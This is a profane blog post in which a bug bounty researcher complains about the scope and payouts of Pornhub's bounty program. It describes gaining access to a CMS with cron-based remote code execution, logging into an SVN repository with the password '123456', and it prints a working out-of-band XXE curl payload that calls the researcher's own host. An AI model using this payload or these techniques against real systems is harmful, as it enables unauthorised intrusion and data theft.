I was possibly the first person invited to the Pornhub Bug Bounty about 11 months ago. Initially this bounty was a private bug bounty entitled "The Pornhub Network" and the scope was originally not limited to a single domain. At least that’s how any normal person would have comprehended the scope in the responsible disclosure policy. There was promise of massive rewards then too, so it seemed intuitive that the scope was the larger Pornhub network as described. Now since it’s public, a maximum reward of $25,000 is a great way of advertising and getting lots of media attention, let alone from the bug bounty community. The reality however is that this figure was most likely pulled out of someone’s ass, which is not that hard to imagine considering the site content. I have seen nothing to suggest they have ever paid anything near that amount as a reward nor intend to. It is simply false advertising in which they receive all the benefit.
The Pornhub Network is a very extensive collection of websites owned by MindGeek . Many of these sites offer premium content and as cream gets the money, dollar dollar bill yall. I approached it like I do any standard penetration test and began information gathering, however given the large number of assets they have, I spent a few evenings on OSINT. Once I started reporting things I found, it became pretty obvious how little thought Pornhub had given to the wording of their scope. It’s also entirely possible they knew exactly what they were doing by advertising large rewards and played me for a fool.
I didn’t write this blog post earlier because soon after the Pornhub bounty went public there was someone on twitter apparantely selling pornhub shells. I certainly didn’t want my findings in the early days of their bounty being associated with that silly carry on. The infosec media is very knee-jerk and often points fingers at potential culprits so I feared I could have ended up on the receiving end of such accusations. I did not want to be associated with a cunt who claimed they fucked up porn sites simply for attention (inorite). Here I am, writing my blog post on how I tried to. Infosec blog posts are basically thinly veiled bragging anyway, complete with trying to play it off that you are actually cool.
After seeing a bukkake of $50 rewards in the public disclosure feeds from hackerone, and seeing people saying the Pornhub bounty sucks on twitter. I’m going to join in and share what I found. The highest reward I received was $750, this was for gaining access to a pornhubpremium.com content management system. It was described as out of scope like pretty much all my other bugs at the time. The bounty scope was updated to include the domains it does now on my request , after I explained to them the shortcomings of their original scoping. I spent a large amount of time looking at and probing their assets, I was severely disappointed when they decided to have a change of heart about their scope at my expense. On hackerone there is nothing stopping any company from doing this in private to researchers. Be very cautious fellow hunters. Many will gladly fuck you over for a cheap pentest. I think in many cases companies don’t even know what assets they have exposed to the internet… they should at least figure this out before going to create a lazy scope.
The first image above is one of the CMS panels I managed to gain access to, the second is something within a panel called DECEPTICron, this basically lets you run a cron job on any of the listed hosts in the image below. That’s a lot of assets with remote code execution if you ask me. A $25k bug if ever I seen one. Pornhub told me it was out of scope (it wasn’t at the time) and that the server was old and soon to be decommissioned, which is fair enough. It’s very understandable that a researcher might over-estimate the severity of a vulnerability they found, in this case however the shells speak for themselves. All of the additional vulnerabilities I reported within the CMS once I gained access were marked out of scope (it was being decommissioned remember).
The second largest reward I got was $500 for essentially finding a few SVN repositories, most were marked out of scope even though one of them was the very in-scope (even now, but the site is gone) http://hubxt.pornhub.com/ . The high severity here was that within the svn/entries I found another third-party external svn repository that required a htpasswd to access. One of the multiple usernames within the entries worked with the password 123456, this gave me full SVN read/write privileges on this repository, which could easily be converted to RCE in probably a lot more ways than simply committing shitty PHP code. The code had a lot of database passwords in it for multiple sites, along with lots of juicy looking stuff that wasn’t porn.
What an orgy.
The third reward I got was $150 for an XXE that appeared in about 3-4 sites on the same subdomain including the pornhub.com domain. The proof of concept I submitted was very basic and I didn’t try escalate it any further as I was already fairly disappointed at this point.
curl -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://makthepla.net/?ProofOfConcept2" >]><username>&xxe;</username>' http://target.domain.com/xml.php
It seemed to me that pornhub just marked stuff out of scope as I reported it and then narrowed their scope section on regular intervals. Now they have a public bounty and are getting a lot of media attention for being pro-security. Very disappointing and demotivational.